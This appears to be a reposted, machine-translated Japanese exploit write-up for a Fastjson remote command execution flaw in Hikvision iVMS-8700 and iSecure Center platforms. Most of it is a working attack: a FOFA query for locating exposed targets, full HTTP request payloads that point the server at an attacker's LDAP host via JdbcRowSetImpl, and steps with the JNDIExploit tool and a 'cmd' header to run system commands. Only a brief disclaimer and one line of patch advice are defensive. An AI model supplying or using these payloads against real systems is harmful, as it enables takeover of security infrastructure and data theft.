Hikvision 統合セキュリティ管理プラットフォーム Fastjson リモート コマンド実行の脆弱性

情報 2023-08-11 21:45:22 訪問数: null

Hikvision 統合セキュリティ管理プラットフォーム Fastjson リモート コマンド実行の脆弱性

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1. Hikvision 統合セキュリティ管理プラットフォームの概要

総合セキュリティ管理プラットフォームは、「統合ソフトウェア技術アーキテクチャ」のコンセプトに基づいて設計されており、ビジネス面でのプラットフォームの弾力的な拡大に対応するためのビジネス要素技術を採用しています。同プラットフォームは業界全体の総合セキュリティビジネス全般に適用可能で、各システムのリソースを統合・一元管理し、統一的な導入・設定・管理・スケジューリングを実現する。

2. 脆弱性の説明

Hikvision の包括的なセキュリティ管理プラットフォームには、Fastjson リモート コマンド実行の脆弱性があり、システム コマンドを実行し、ターゲット サーバーのシステム権限と機密データ情報を取得する可能性があります。

3、衝撃バージョン

V2.0.0 <= iVMS-8700 <= V2.9.2

V1.0.0 <= iSecure Center <= V1.7.0

4. 脆弱性の再発

FOFA: app="HIKVISION - 包括的なセキュリティ管理プラットフォーム"

ここに画像の説明を挿入
脆弱性データパッケージは次のとおりです。

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196

{
    
    "a":{
    
    "@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
    
    "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

まず、ldap が dnslog を実行してエコーできるかどうかをテストし、リクエストを受信できる場合は、コマンド実行の脆弱性がある可能性が高くなります。

ここに画像の説明を挿入

Xiaolong POC ワンクリックハラ Less

Xiaolong POC ポータル: Xiaolong POC ツール
ここに画像の説明を挿入
dnslog がリクエストを受信できることを確認したら、さらに使用することができます JNDIExploit-1.3-SNAPSHOT.jar ツールを使用して次のコマンドを実行します

ツールのダウンロード アドレス: JNDIExploit

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip

ここに画像の説明を挿入
次に、Burp のリクエスト パケットのヘッダーにフィールドを追加しますcmd: whoami。ここで cmd はシステム コマンドを実行できます。以下のペイロードで、次のように ldap を VPSip/Basic/TomcatEcho に変更します。

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215

{
    
    "a":{
    
    "@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
    
    "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

Burp はパッケージを配置し、
ここに画像の説明を挿入
コマンドの実行に成功しました。

5. 修理計画

現在、メーカーより修正パッチが提供されておりますので、公式サイトより該当バージョンのパッチをダウンロードしてください。

おすすめ

転載: blog.csdn.net/holyxp/article/details/131897870
おすすめ
ランキング
--- ELオプションを搭載するテンプレートを指定するオプションをレンダリング別テンプレート/使用を指定するためのオプションを使用して、インラインテンプレート/テンプレートの使用を指定するために、テンプレート/テンプレートオプションを使用してテンプレートを指定します
0216leetcodeはPythonで5つの質問をブラシします
ショック!七つの子どもたちは魂を拷問しました!暴露子どもたちはインサイダーを振っプログラム!
ターゲット属性タグをhtmlの
Linuxビルドnacosスタンドアロンバージョンとクラスター
Cálculo experimental da renda simulada de investimento fixo do fundo
Kali Linux は VMware ツールをインストールします (vmtools ボタンは灰色です)
程序员洞察报告:90后占比过半 搜索算法等岗位人才短缺
【Java基礎シリーズチュートリアル】第17章 Javaアノテーション
Javaでの空白を入力できないようにユーザー
アーカイブ
もっと
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(35)

コードワールド

© 2018 codetd.com